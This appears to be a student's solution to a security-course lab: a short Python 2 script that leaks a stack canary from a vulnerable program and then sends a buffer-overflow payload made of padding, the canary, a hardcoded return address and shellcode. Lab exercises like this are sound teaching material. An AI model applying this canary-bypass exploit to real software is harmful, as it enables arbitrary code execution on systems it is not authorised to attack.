#!/usr/bin/env python2 

from scaffold import *
import codecs



#   p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
# where m, canary, n and rip are all values you must determine
# and you might need to add a '\x00' somewhere

### YOUR CODE STARTS HERE ###

p.send("A"*12 + "\\x\n")
foo = p.recv(20)
print([hex(ord(b)) for b in foo])
foo = foo[13:20]
print([hex(ord(b)) for b in foo])
p.send("A"*15 + '\x00' + foo + "B"*5 + "\x84\xfc\xff\xbf" + SHELLCODE + '\n')

### YOUR CODE ENDS HERE ###

returncode = p.end()

if returncode == -11: print 'segmentation fault or stack canary!'
elif returncode != 0: print 'return code', returncode
